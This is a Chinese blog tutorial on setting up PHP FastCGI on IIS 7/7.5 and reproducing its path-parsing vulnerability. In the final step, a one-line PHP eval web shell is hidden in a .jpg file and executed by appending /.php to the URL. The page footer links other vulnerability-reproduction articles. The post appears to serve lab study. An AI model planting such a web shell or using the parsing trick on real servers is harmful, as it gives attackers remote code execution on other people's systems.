程序员经验分享-hwhale

复现iis7/ii7.5的fastcgi解析漏洞

2023-10-27

在windows server 2008 r2上搭建 php服务
1、下载php解释器

地址为http://windows.php.net/download/
版本有两种,线程安全和非线程安全,线程安全是给apache用的,非线程安全是给iis用的,我们要配的是iis,所以下载非线程安全的,x86和x64看自己的机器是什么系统选择对应的版本下载就行了。

安装vcredist_x64.exe

2、安装php解释器

php可以说不用安装的,只要将文件解压到c:\php(一般不放在系统盘,那么就放E:\PHP)文件夹,就算安装完成了。
3、配置php.ini
拷贝php.ini-development,改名为php.ini,并进行如下修改:
注意每个选项前面的分号 如果开启这个选项可以就直接删除掉前面的分号

3、配置php.ini

拷贝php.ini-development,改名为php.ini,并进行如下修改:
(1)扩展插件的路径
[html] view plain copy
1 ; Directory in which the loadable extensions (modules) reside.
2 ; http://php.net/extension-dir
3; extension_dir = “./”
4 ; On windows:
5 extension_dir = “c:\php5\ext”
修改最后一行,填入自己真实的PHP解释器地址,以及后面跟着ext文件夹,这个里面放的都是插件

(2)设置要引入哪些插件
[html] view plain copy
1 ; Windows Extensions
2 ; Note that ODBC support is built in, so no dll is needed for it.
3 ; Note that many DLL files are located in the extensions/ (PHP 4) ext/ (PHP 5)
4 ; extension folders as well as the separate PECL DLL download (PHP 5).
5.; Be sure to appropriately set the extension_dir directive.
6 ;
7 ;extension=php_bz2.dll
8.;extension=php_curl.dll
9 ;extension=php_fileinfo.dll
10 ;extension=php_gd2.dll
11 ;extension=php_gettext.dll
12 ;extension=php_gmp.dll
13 ;extension=php_intl.dll
14 ;extension=php_imap.dll
15 ;extension=php_interbase.dll
16 ;extension=php_ldap.dll
17 extension=php_mbstring.dll
18 ;extension=php_exif.dll ; Must be after mbstring as it depends on it
19 extension=php_mysql.dll
20 extension=php_mysqli.dll
21 ;extension=php_oci8_12c.dll ; Use with Oracle Database 12c Instant Client
22 ;extension=php_openssl.dll
23 ;extension=php_pdo_firebird.dll
24 ;extension=php_pdo_mysql.dll
25 ;extension=php_pdo_oci.dll
26 ;extension=php_pdo_odbc.dll
27 ;extension=php_pdo_pgsql.dll
28 ;extension=php_pdo_sqlite.dll
29 ;extension=php_pgsql.dll
30 ;extension=php_shmop.dll
要引入的插件,只要把前面的分号去掉就可以了,我这里只引入了mysql、mysqli、mbstring。

(3)设置时区

[html] view plain copy
1[Date]
2 ; Defines the default timezone used by the date functions
3; http://php.net/date.timezone
4date.timezone = Asia/Shanghai

(4)支持短标签

[html] view plain copy
1 ; This directive determines whether or not PHP will recognize code between
2.; <? and ?> tags as PHP source which should be processed as such. It is
3 ; generally recommended that <?php and ?> should be used and that this feature
4 ; should be disabled, as enabling it may result in issues when generating XML
5 ; documents, however this remains supported for backward compatibility reasons.
6; Note that this directive does not control the <?= shorthand tag, which can be
7 ; used regardless of this directive.
8 ; Default Value: On
9 ; Development Value: Off
10 ; Production Value: Off
11 ; http://php.net/short-open-tag
12 short_open_tag = On

(5)启用fastcgi

[html] view plain copy
1 ; FastCGI under IIS (on WINNT based OS) supports the ability to impersonate
2 ; security tokens of the calling client. This allows IIS to define the
3; security context that the request runs under. mod_fastcgi under Apache
4 ; does not currently support this feature (03/17/2002)
5 ; Set to 1 if running under IIS. Default is zero.
6 ; http://php.net/fastcgi.impersonate
7 fastcgi.impersonate = 1

(6)cgi相关设置pathinfo

[html] view plain copy
1 ; cgi.fix_pathinfo provides real PATH_INFO/PATH_TRANSLATED support for CGI. PHP’s
2 ; previous behaviour was to set PATH_TRANSLATED to SCRIPT_FILENAME, and to not grok
3 ; what PATH_INFO is. For more information on PATH_INFO, see the cgi specs. Setting
4 ; this to 1 will cause PHP CGI to fix its paths to conform to the spec. A setting
5 ; of zero causes PHP to behave as before. Default is 1. You should fix your scripts
6 ; to use SCRIPT_FILENAME rather than PATH_TRANSLATED.
7 ; http://php.net/cgi.fix-pathinfo
8 cgi.fix_pathinfo=1

(7)cgi相关设置redirect

[html] view plain copy
1 ; cgi.force_redirect is necessary to provide security running PHP as a CGI under
2 ; most web servers. Left undefined, PHP turns this on by default. You can
3 ; turn it off here AT YOUR OWN RISK
4 ; You CAN safely turn this off for IIS, in fact, you MUST.
5 ; http://php.net/cgi.force-redirect
6 cgi.force_redirect = 0

(8)session存储路径

[html] view plain copy
1 ; where MODE is the octal representation of the mode. Note that this
2 ; does not overwrite the process’s umask.
3 ; http://php.net/session.save-path
4 session.save_path = “d:\server\web\session”

(9)数据库

mysql.default_port = 3306
mysql.default_host = localhost
mysql.default_user = root

(10)输出缓存

[php] view plain copy
1 ; Note: This directive is hardcoded to Off for the CLI SAPI
2 ; Default Value: Off
3 ; Development Value: 4096
4 ; Production Value: 4096
5 ; http://php.net/output-buffering
6 output_buffering = On//这里应该是填一个值,比如4096

(11)限定上传文件体积最大值

[php] view plain copy
1 upload_max_filesize = 100M
1 display_errors=On
2 error_log=“C:\windows\Temp\php-5.x.yy_errors.log”
3 error_reporting = E_ALL
4 fastcgi.logging = 0
5 html_errors=On
6 log_errors = On

4、将php.ini放到系统目录

配置完成之后,将php.ini拷贝一份放到c:\windows下。注意,如果是win7使用的iis7已经不需要这么做了。

5、下面配置iis支持phpcgi
(1)安装IIS

在这里插入图片描述
勾选所有和ISS相关的选项
在这里插入图片描述
在这里插入图片描述
按着提示装完

(2)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

(3)添加站点

在网站路径下创建一个文件夹,在IIS中添加站点,将此文件夹作为站点添加进去
直接进行访问 我们新建一个文件

这时候 我们把<?php @eval($_POST[‘cmd’]);?> 写到 一个txt文档里面 并且 把这个文档的后缀名改为.jpg 图片格式 这时候放到网站的目录下去访问 并给后面加上/.php

就会发现时空白页面 这就是产生了解析漏洞
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

漏洞复现

复现iis7/ii7.5的fastcgi解析漏洞 的相关文章

  • Laravel 远程代码执行漏洞(CVE-2021-3129)复现

    Laravel 远程代码执行漏洞 CVE 2021 3129 复现 一 漏洞概述 Laravel是一套简洁 优雅的PHP Web开发框架 PHP Web Framework 它可以让你从面条一样杂乱的代码中解脱出来 它可以帮你构建一个完美的

  • Tomcat一些漏洞的汇总

    前言 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器 属于轻量级应用 服务器 在中小型系统和并发访问用户不是很多的场合下被普遍使用 是开发和调试JSP 程序的首选 目录 一 Tomcat 任意文件写入 CVE 2017 12

  • Webpack Sourcemap文件泄露漏洞

    Webpack Sourcemap文件泄露漏洞 前言 一 Webpack和Sourcemap 1 1 什么是Webpack 1 2 什么是Sourcemap 二 漏洞利用 2 1 使用reverse sourcemap工具 2 1 直接看前

  • Windows2003系统漏洞提权复现

    操作系统 Microsoft Windows Server 2003 Web服务器 IIS V6 0 第一步 将大马文件上传至服务器根目录 第二步 访问大马文件 进入大马的控制界面 第三步 查看漏洞补丁信息 第四步 上传漏洞工具 将提权工具

  • Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)

    0x01 漏洞简介 fastjson是阿里巴巴的开源JSON解析库 它可以解析JSON格式的字符串 支持将Java Bean序列化为JSON字符串 也可以从JSON字符串反序列化到JavaBean 即fastjson的主要功能就是将Java

  • Struts2远程代码执行漏洞

    漏洞描述 CVE 2020 17530是对CVE 2019 0230的绕过 Struts2官方对CVE 2019 0230的修复方式是加强OGNL表达式沙盒 而CVE 2020 17530绕过了该沙盒 在特定的环境下 远程攻击者通过构造恶意

  • 漏洞复现之CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

    1 1 1 漏洞描述 在2015年4月安全补丁日 微软发布的众多安全更新中 修复了HTTP sys中一处允许远程执行代码漏洞 编号为 CVE 2015 1635 MS15 034 利用HTTP sys的安全漏洞 攻击者只需要发送恶意的htt

  • DVWA靶机,通过XSS盗取cookie登录

    文章目录 一 发现XSS漏洞 1 1 登录DVWA 找到XSS DOM 模块 测试XSS是否存在 1 2 在选项的传参后面加入一串js代码 也就是可以XSS弹出的代码 payload如下 二 盗取cookie 2 1 在XSS平台上搭建一个

  • Struts2反序列化漏洞复现

    环境 vulhub 环境搭建 进入s2 048目录 切换root用户 启动漏洞环境 docker compose up d 漏洞复现 浏览器访问 showcase Gangster Name输入 233 233 其余随便填 将Gangste

  • (s2-048)Struts2 反序列化漏洞

    Struts2 Struts2是一个基于MVC设计模式 java 的Web应用框架 它本质上相当于一个servlet 在MVC设计模式中 Struts2作为控制器 Controller 来建立模型与视图的数据交互 Struts2 是 Apa

  • ActiveMQ 反序列化漏洞(CVE-2015-5254)漏洞复现vulhub

    ActiveMQ 反序列化漏洞 CVE 2015 5254 Apache ActiveMQ是美国阿帕奇 Apache 软件基金会所研发的一套开源的消息中间件 它支持Java消息服务 集群 Spring Framework等 Apache A

  • 【1day】复现深信服数据中心管理系统 XXE漏洞——可读取文件

    目录 一 漏洞描述 二 影响版本 三 资产测绘 四 漏洞复现 一 漏洞描述 深信服的数据中心管理系统DC是一种外置的AC 异地扩展备份管理 数据中心 它提供了强大的功能和灵活性 旨在满足日志数据处理的需求 该系统具备多种高级功能 包括多条件

  • Kafka Connect JNDI注入漏洞复现(CVE-2023-25194)

    漏洞原理 Apache Kafka Connect中存在JNDI注入漏洞 当攻击者可访问Kafka Connect Worker 且可以创建或修改连接器时 通过设置sasl jaas config属性为com sun security au

  • MongoDB未授权访问漏洞复现及加固

    说明 仅供技术学习交流 请勿用于非法行为 否则后果自负 0x01 漏洞简述 MongoDB是一个介于关系数据库和非关系数据库之间的产品 是非关系数据库当中功能最丰富 最像关系数据库的 它支持的数据结构非常松散 是类似json的bson格式

  • Spring Boot Actuator未授权访问漏洞利用

    目录 一 前言 二 端点描述 三 漏洞发现 四 漏洞利用 五 安全措施 六 安全建议 一 前言 Actuator 是 Spring Boot 提供的服务监控和管理中间件 当 Spring Boot 应用程序运行时 它会自动将多个端点注册到路

  • 漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现

    0x00 简介 ThinkCMF是一款基于ThinkPHP MySQL开发的中文内容管理框架 ThinkCMF提出灵活的应用机制 框架自身提供基础的管理功能 而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务

  • Docker未授权访问漏洞(www.hetianlab.com)

    什么是Docker Docker是一个开源的引擎 可以轻松的为任何应用创建一个轻量级的 可移植的 自给自足的容器 开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署 包括VMs 虚拟机 bare metal OpenStack 集

  • Mkdocs 存在任意文件读取漏洞

    文章目录 Mkdocs 存在任意文件读取漏洞 1 Mkdocs简介 2 漏洞描述 3 影响版本 4 fofa 查询语句 5 漏洞复现 6 POC EXP 7 整改意见 8 往期回顾 Mkdocs 存在任意文件读取漏洞 1 Mkdocs简介

  • 网神防火墙后台用户敏感信息泄露漏洞复现

    简介 网神防火墙是一款由中国知名网络安全公司启明星辰开发的防火墙产品 它提供了全面的网络安全防护功能 旨在保护企业网络免受各种网络威胁和攻击 该产品存在用户账号信息泄露漏洞 通过构造特定数据包 获取防火墙管理员登录的账号密码 漏洞复现 FO

  • 安恒明御安全网关aaa_local_web_preview 任意文件上传漏洞复现

    简介 安恒明御安全网关是一个网络安全产品 由安恒信息技术股份有限公司开发和提供 它是一个综合性的安全管理平台 用于保护企业网络免受各种网络威胁的攻击 该产品aaa local web preview端点存在文件上传漏洞 漏洞复现 FOFA语

随机推荐

  • VMware vCenter Server 8.0安装并添加ESXi 7.0主机(含ESXi 6.7版本升级至7.0版本)

    目录 一 VMware vSphere虚拟化方案名词梳理 1 VMware Workstation 虚拟化工具 2 VMware vSphere 虚拟化方案 2 1 ESXi 裸金属架构的虚拟化技术 2 2 vCenter Server 批

  • # DevOps名词定义梳理

    DevOps名词定义梳理 极限编程座右铭 如果它令你很受伤 那么就做更多的练习 If it hurts do it more often 经常人们会把这些名词用错 构建 就是把源代码制成成品的过程 这个过程一般会有单元测试 集成 将各个项目

  • Python3.7 Scrapy 提示def write(self,data,asyc) 语法错误

    Scrapy 执行爬虫任务 提示如下错误信息如下 from twisted conch import manhole telnet File D python3 6 Lib site packages twisted conch manho

  • es中修改索引名称命令_在Elasticsearch中更改索引名称

    es中修改索引名称命令 嘿 今天 我碰巧写了一个脚本来解决一个看起来很多人都面临的特定问题 重命名给定的Elasticsearch索引 自然地 有记录在案的解决方案 但是我没有Swift找到一个脚本可以让我找到我想要的位置 来自索引a所有数

  • Latex 字体加粗

    textbf w 显示为 w textbf w w

  • mysql数据库datetime字段转换成java中Date类型

    最终代码展示 输出Account类型对象 使用ResultSet类中的getDate方法只能获取到获取到日期不能得到时间 使用ResultSet类中的getTime方法只能获取到获取到时间不能得到日期 使用ResultSet类中的getTi

  • Java 开发中常见的异常有哪些?

    1 空指针异常 NullPointException 当对象不存在 却又去调用对象的属性或方法时 就会出现该异常 2 数组越界异常 ArrayIndexOutOfBoundsException 当数组只存在5个元素 他们所对应的的下标即为0

  • MySQL显示ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)解决方法

    MySQL显示ERROR 2003 HY000 Can t connect to MySQL server on localhost 10061 解决方法 第一步 在win快捷键下已管理员身份启动cmd命令然后进入mysql安装目录下的bi

  • 10信号学习之signal函数及使用其实现信号捕捉案例

    1 signal函数 功能 该函数注册一个信号捕捉函数 对比上一篇的案例和相关函数 都是针对于信号集操作的 而这个函数是针对处理动作来操作的 你可以利用此函数将捕捉到的信号按自己的方式执行 例如你可以捕捉段错误的信号后执行打印hello w

  • STM32无法下载程序

    新研发了一块STM32板 MCU使用的是STM32F4 前期硬件测试都是正常的 电源等各项硬件指标都是正常的 但是在下载程序测试的时候出现了问题 板子只能下载第一次程序成功 第二次就不能识别芯片 无法下载程序 貌似MCU被锁死 检查原理图并

  • warning: unknown attribute ‘at‘ ignored [-Wunknown-attributes] keil报错处理

    背景在KEIL v6版本编译 attribute at 语句 const unsigned char vis sensor fw attribute at 0X0800C800 0x98 0x14 0x00 0x20 0x65 0x01 0

  • java Spring调试 ApplicationContext cannot be resolved to a type

    今天开发过程中遇到了不能识别导入的Spring jar包的情况 ApplicationContext cannot be resolved to a type 本人分析情况为两种 1 导入的包错误 2 本人遇到的情况 就是jre版本过高 将

  • RawImages图片加载方式

    using UnityEngine using UnityEngine UI public class RawImagesExtend MonoBehaviour Header 资源加载方式 public SourceMode source

  • java底层学习

    额 马上就要面试了 java的底层肯定是需要了解的 网上找了找java的底层文章 做个记号 java底层主要是类的加载 连接和初始化 本文主要分为四个方面 1 java底层概述 2 new和newInstance 方法的区别 3 深入探讨j

  • activiti5之监听器

    activiti5之监听器 业务场景 在使用工作流时 通常伴随着很多具体的需求 例如 activiti人员动态的分配 当前任务节点完成的时候 指定需要指定下一个节点的处理人 比如 一个请假流程 a员工请假 需要指定下一步需要处理请假流程的领

  • Python目标检测数据集格式处理,VOC格式转YOLO格式

    众所周知 CV算法模型训练第一步该做的是数据集制作 最近遇到需要将VOC格式的数据集转为yolo格式 数据集前期的一些预处理参考博客 Python删除txt文档的某一列 fengfeng18k的博客 CSDN博客 Python修改txt某列

  • 卷积神经网络(CNN)入门:使用Python实现手写数字识别

    在上一篇文章中 我们介绍了如何使用Python实现一个简单的前馈神经网络 本文将重点介绍卷积神经网络 CNN 这是一种在计算机视觉任务中表现优异的深度学习模型 我们将从卷积神经网络的基本原理开始 介绍卷积层 池化层和全连接层等概念 然后使用

  • js实现回到顶部效果

    功能 滚动到第二屏才出现 返回顶部 按钮 点击 返回顶部 按钮会返回顶部 而且速度越来越慢 在返回顶部的途中如果用鼠标滚一下滚轮会停止返回顶部的滚动

  • python数据分析(预测性分析与机器学习)

    本文涉及到的主题如下所示 预处理 基于逻辑回归的分类 基于支持向量机的分类 基于ElasticNetCV的回归分析 支持向量回归 基于相似性传播 均值漂移算法 遗传算法 神经网络 决策树算法 1 预处理 在上一章 我们已经做过一次预处理 即

  • 复现iis7/ii7.5的fastcgi解析漏洞

    在windows server 2008 r2上搭建 php服务 1 下载php解释器 地址为http windows php net download 版本有两种 线程安全和非线程安全 线程安全是给apache用的 非线程安全是给iis用

热门标签